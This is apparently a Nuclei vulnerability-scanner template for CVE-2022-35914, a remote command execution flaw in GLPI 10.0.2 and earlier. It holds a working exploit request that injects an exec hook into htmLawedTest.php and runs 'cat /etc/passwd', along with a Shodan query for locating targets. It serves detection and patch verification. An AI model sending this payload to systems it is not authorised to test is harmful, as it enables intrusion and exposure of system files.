57 lines
1.8 KiB
YAML
57 lines
1.8 KiB
YAML
id: CVE-2022-35914
|
|
|
|
info:
|
|
name: GLPI <=10.0.2 - Remote Command Execution
|
|
author: For3stCo1d
|
|
severity: critical
|
|
description: |
|
|
GLPI through 10.0.2 is susceptible to remote command execution injection in /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module.
|
|
remediation: |
|
|
Upgrade GLPI to a version higher than 10.0.2 to mitigate this vulnerability.
|
|
reference:
|
|
- https://mayfly277.github.io/posts/GLPI-htmlawed-CVE-2022-35914
|
|
- https://github.com/cosad3s/CVE-2022-35914-poc
|
|
- http://www.bioinformatics.org/phplabware/sourceer/sourceer.php?&Sfs=htmLawedTest.php&Sl=.%2Finternal_utilities%2FhtmLawed
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-35914
|
|
- https://github.com/glpi-project/glpi/releases
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2022-35914
|
|
cwe-id: CWE-74
|
|
epss-score: 0.96863
|
|
epss-percentile: 0.99618
|
|
cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: glpi-project
|
|
product: glpi
|
|
shodan-query: http.favicon.hash:"-1474875778"
|
|
tags: cve,cve2022,glpi,rce,kev
|
|
variables:
|
|
cmd: "cat+/etc/passwd"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Cookie: sid=foo
|
|
|
|
sid=foo&hhook=exec&text={{cmd}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a00483046022100a75f408491ee891f548c214f81e87903a0d60fec845ef2c81290aab47b0ab37e02210096453287ef82cdaad24a9d68beb46c63d879ca152fa0cfb0811134ff2fa645d5:922c64590222798bb761d5b6d8e72950
|